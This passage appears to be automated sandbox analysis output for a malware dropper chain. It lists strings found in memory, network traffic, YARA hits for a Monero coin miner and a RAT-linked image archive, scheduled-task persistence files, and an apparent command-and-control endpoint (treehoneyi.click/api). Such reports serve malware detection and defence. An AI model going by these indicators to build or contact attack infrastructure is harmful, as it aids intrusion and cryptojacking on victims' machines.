Source: 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603779683.000001FED92AB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604675756.000001FED92B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js1BACCDE8yst
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js59A495B9
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsF22BD0CDest
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: 0516ff61af.exe, 00000007.00000003.2503330264.0000000005E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0516ff61af.exe, 00000007.00000003.2525468845.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2503330264.0000000005E73000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2503512455.0000000005E27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 0516ff61af.exe, 00000007.00000003.2503512455.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 0516ff61af.exe, 00000007.00000003.2525468845.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2503330264.0000000005E73000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2503512455.0000000005E27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 0516ff61af.exe, 00000007.00000003.2503512455.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.00000000011E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.0000000001128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/api
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.00000000011FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/api6
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.00000000011FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click:443/api
Source: 0516ff61af.exe, 00000007.00000003.2572778765.000000000145C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 0516ff61af.exe, 00000007.00000003.2478796488.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2478761331.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 0516ff61af.exe, 00000007.00000003.2501717799.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learni
Source: 0516ff61af.exe, 00000007.00000003.2478796488.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2479349840.000000000140C000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2479498664.0000000001422000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0516ff61af.exe, 00000007.00000003.2572778765.000000000145C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605438280.000001FED92CD000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/0
Source: 6eea3e30e9.exe, 0000000C.00000003.2591931438.000002479E961000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/8
Source: 6eea3e30e9.exe, 0000000D.00000003.2605342438.000001FED92A1000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604805622.000001FED92A0000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604560234.000001FED9294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/X
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605292956.000001FED92DE000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/aomek
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/com/
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604374375.000001FED92B9000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605040503.000001FED92BB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604623251.000001FED92BA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/le.com
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 6eea3e30e9.exe, 0000000D.00000003.2604374375.000001FED92B9000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605040503.000001FED92BB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604415171.000001FED92AA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92C0000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603779683.000001FED92AB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604675756.000001FED92B0000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604623251.000001FED92BA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E949000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604332884.000001FED92A4000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604415171.000001FED92AA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603779683.000001FED92AB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604675756.000001FED92B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly4C47B199334
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly4EEE6F7Foog
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly56D1DC42
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCF630DF4nte
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore2233E
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreDttp
Source: 6eea3e30e9.exe, 0000000D.00000003.2605040503.000001FED92BB000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92C0000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604623251.000001FED92BA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreO
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra23EE992EDate
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra66F3ACB03BD00
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox0875E9
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox7FnstD
Source: 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxd
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604374375.000001FED92B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxw
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0516ff61af.exe, 00000007.00000003.2549916371.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 6eea3e30e9.exe, 0000000D.00000003.2601864727.000001FED9297000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2601864727.000001FED9294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.2781133472.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.2781133472.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.2781133472.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49861 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 48.3.Intel_PTT_EK_Recertification.exe.131c27b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.3.Intel_PTT_EK_Recertification.exe.17227910000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000027.00000003.2774998618.0000017227910000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000030.00000003.2926529139.00000131C27B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Drops password protected ZIP file
Source: file.bin.15.dr Zip Entry: encrypted
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 0516ff61af.exe.6.dr Static PE information: section name:
Source: 0516ff61af.exe.6.dr Static PE information: section name: .idata
Source: 0516ff61af.exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: 1b73492cb0.exe.6.dr Static PE information: section name:
Source: 1b73492cb0.exe.6.dr Static PE information: section name: .idata
Source: 1b73492cb0.exe.6.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0037CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_0037CB97
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe File created: C:\Windows\Tasks\Gxtuum.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE78BB 0_2_00DE78BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE7049 0_2_00DE7049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE8860 0_2_00DE8860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE31A8 0_2_00DE31A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA4B30 0_2_00DA4B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA4DE0 0_2_00DA4DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE2D10 0_2_00DE2D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE779B 0_2_00DE779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD7F36 0_2_00DD7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A8860 1_2_003A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A7049 1_2_003A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A78BB 1_2_003A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A31A8 1_2_003A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00364B30 1_2_00364B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A2D10 1_2_003A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00364DE0 1_2_00364DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00397F36 1_2_00397F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003A779B 1_2_003A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A8860 2_2_003A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A7049 2_2_003A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A78BB 2_2_003A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A31A8 2_2_003A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00364B30 2_2_00364B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003A2D10 2_2_003A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00364DE0 2_2_00364DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00397F36 2_2_00397F36
